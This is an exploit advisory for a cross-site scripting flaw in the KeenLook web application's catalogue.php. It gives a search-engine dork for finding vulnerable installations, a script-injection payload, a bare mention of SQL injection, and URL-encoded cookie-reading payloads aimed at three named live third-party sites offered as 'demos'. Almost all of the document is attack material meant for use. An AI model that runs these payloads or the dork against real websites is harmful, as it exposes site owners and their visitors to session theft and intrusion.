# Exploit Title: KeenLook XSS Vulnerability
# Date: 26/02/2013
# Author: The Black Devils
# Software Link: http://www.keenlook.com/
# Category : [ webapps ]
# Dork : Powered By KeenLook inurl:catalogue.php?page=
# Type : php
# Tested on: [Windows] & [Ubuntu]
-------------------------------
http://localhost/[Path]/catalogue.php?page='"><script>alert(1337);</script>'
http://localhost/[Path]/catalogue.php?page=[sql injection]
-------------------------------
# Demo site:
http://www.cordial-zulco.com/catalogue.php?cid=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27
http://www.uniqueedge.org/catalogue.php?page=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27
http://www.gimamedical.com/catalogue.php?pID=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%27
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com